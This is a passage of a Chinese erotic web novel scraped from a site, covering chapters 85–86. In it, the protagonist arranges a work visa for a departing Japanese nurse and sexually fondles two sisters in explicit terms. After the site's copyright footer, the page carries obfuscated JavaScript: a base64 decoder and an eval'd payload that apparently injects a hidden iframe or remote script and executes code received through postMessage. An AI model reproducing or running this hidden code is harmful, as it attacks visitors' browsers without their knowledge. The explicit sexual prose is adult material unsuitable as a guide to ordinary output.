事儿了?”香奈只是小声的抽泣,死死的抱住男人的脖子,好像一松手他就会消失一样。“到底怎么了?你告诉我,有什么事儿咱们一起商量。”男人很有耐心。“是啊,你有什么难处就告诉涛哥吧。”陈倩走了过来,把一张纸巾塞到香奈的手里,陈曦也过来了。刚才这两姐妹可没少给侯龙涛吃软钉子,七成是真的气他花心,三成是和他逗着玩儿,后来听说要来的人是在医院一直护理爱人的护士,气就又小了两成,现在见到香奈的样子,一看就是受了委屈,心就更软了。“谢谢…”香奈抬起头,擦了擦眼泪,这才仔细的打量了两个女人一下儿。她们都是长发披肩,上着很淡雅的妆,刚才坐着还看不出来,现在站到了面前,才发觉她们的个子高高的,两人穿着一模一样的双吊带白纱连身短裙、黑色的高跟鞋、r色的长丝袜,因为没穿衬裙和内衣,美秒的身体好似罩在一层薄雾里,真是仙气中透着性感。姐妹俩在这之前是精心梳洗过的,她们不知道香奈长的什么样子、着装有什么特点,但出于女人的本能和战胜“外敌”的心理,她们做了充分的准备。等真见了人,光从外表上看,这个日本女人好像挺秀气的,小巧玲珑,是属于可爱型的,两姐妹又都不约而同的觉得自己的打扮有点儿过了…第八十五章完第八十六章 中日友好 4/2/2003-4/5/2003香奈穿了一条低腰的碎花儿长裙,浅灰色的纯棉小t-shirt,外罩一件白色的牛仔短上衣,白鞋白袜,跟普通的北京都市少女没有一点儿区别。侯龙涛把手放在她的腰际,摩挲着平平的小腹,一根手指轻轻的按压肚脐儿,另外一只手是在她的臀腿间活动,“好香奈,是在医院被人欺负了吗?告诉我。”“我…”香奈咬着微颤的下唇,伸手抚摸着男人的脸颊,双眸中尽是忧伤的眼神,“涛…谢谢你这段时间对我的照顾,谢谢你带给我的快乐,是你的温柔才使我心灵上的创伤愈合,我…我…”她的眼泪又流出来了。“说这些干什么啊?我喜欢你,自然要让你快乐了,有什么谢不谢的?”“涛,我不想离开你…呜…呜…我不想离开你…”香奈把头埋在男人的耳边,开始痛哭,双肩不住的抖动着。“唉,”侯龙涛轻抚着她的后背和半长的黑发,由于被女人的情绪感染,脸上也出现了淡淡的忧伤,“傻瓜,不想离开我就不要离开我嘛,你不是还要再在北京留几个月吗?到时你要是真的舍不得我,咱们再想办法。”“没…没时间了,没时间了,”香奈轻声的呜咽着,“大使…大使馆通知我们,后天就…就回国…回国,不得以任何…任何藉口逗留…后天啊…”“为什么!?”侯龙涛吃了一惊。“不…不知道,大使馆派来通知我们的人没说,他不说,只告诉…只告诉我们是为了我们的人身安…安全。”爱上侯龙涛,却被迫要和他分离,这种感觉陈曦最清楚,陈倩也不是一点儿没有体会过,香奈的话一出口,两个女人立刻产生了的共鸣,起了同病相怜之心,一时也顾不得生他们的气了,更何况侯龙涛刚才用的词儿是“喜欢”而不是“爱”,姐妹俩已经赢了。陈倩蹲了下去,扶住香奈的腿,她不知道怎么安慰她,只能以这种形式来表达同情。“你不用着急,涛哥一定会有办法的。”陈曦去给香奈倒了杯水,在她心里,侯龙涛是无所不能的。“真的吗?”香奈满怀希望的盯着男人,“涛…”这回轮到侯龙涛犯难了,他虽然很喜欢香奈,但和对其他女人的感情比起来,毕竟还是差了那么一点儿,他不想因为要把这个日本姑娘留在身边而又在众女间造成麻烦,一个没出现的张玉倩就已经让他受了不少“数落”了。“老公。”陈倩捏住了男人的肩膀。“嗯。”看到自己心中女神认可的眼神,侯龙涛点了点头,“办法有一个,但无论如何,你也是一定得先回日本一段时间的。”“你说,你快说。”香奈用手背抹了一把眼泪,忧伤的表情也退去了一点儿。“其实很简单,我可以聘请你做我的私人护理,或是东星集团的专职护士,这样你就可以用工作签证留在中国,当然了,这都得以你辞去在日本医院的职务为前提,而且需要一段时间来办理,所以你还是得先回去。”侯龙涛对这事儿有一定的把握,因为刘南的工作签证就是“常青藤”办的,交给他就行了。香奈立刻就破涕为笑了,捧着男人的脸一通亲吻。陈氏姐妹也露出了笑容,有些人就是招人喜欢,可能这个日本姑娘就属于那种人。“哼哼,又哭又笑,弄成个大花脸,都多大岁数儿了?”侯龙涛把小护士从腿上放了下来。“我…我能去洗洗吗?”香奈看了一眼陈倩。“就在那儿。”陈倩指了指洗手间。等香奈离开了,侯龙涛把两姐妹搂到身前,“你们不怪我了?”“怪你什么?怪你太招女人喜欢吗?”“唉,你这个花心大罗卜,真要怪你还不早就怪了,还会跟着你吗?”姐妹俩的语气都是哀哀怨怨的,听得男人是一阵自责、一阵怜惜、一阵感动、一阵欣喜,圈着二女的胳膊紧了紧。陈倩和陈曦同时抬起了头,两条香滑的软舌一起在男人的嘴边戏耍着,侯龙涛也不示弱,低头轮流吮吻姐妹俩白皙的脸颊、脖子,还把手伸进她们的裙子里,不规矩的揉捏她们光滑的p股,用手指在她们的臀沟里这儿抠抠、那儿捅捅,没两下儿就让她们发出了“咿咿呀呀”的娇声。香奈从洗手间里出来了,第一眼就看到三个人抱在一起的样子,那两个女人脸上都罩着一层淡淡的红色,更显得妩媚艳丽,修长的玉腿、圆翘的臀峰、挺拔的胸脯儿,样样都是那么的完美,她身为女人,看了都有点儿动心,更别提那个左拥右抱的男人了。小护士一方面被眼前的“美景”所迷,另一方面不禁从心底生出些许自卑,她知道,如果这两个“天朝美女”是日月的话,自己最多也就算是寸烛之光,岂敢争辉。同时,她也更加感激侯龙涛了,他能将温柔分出一丝给自己,足见他对自己不光是野兽般的欲,还有人性中的情与爱。香奈低着头,双手握着放在小腹前,静静的站了一会儿,男人才发现她已经回到了身边。侯龙涛把手从陈氏姐妹的短裙中抽了出来,改成搂着她们的小蛮腰,转过身来,“这么半天了,还没给你正式介绍呢,这是陈倩,你的小倩姐姐,这是陈曦,你的小曦妹妹,一会儿你们姐姐妹妹就得一起跟我亲热,哈哈哈。”“你没有点儿正经的吗?”右边的陈倩掐住了男人的腰眼儿。“唉呦…”侯龙涛向边儿上一躲,可左边的陈曦也
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}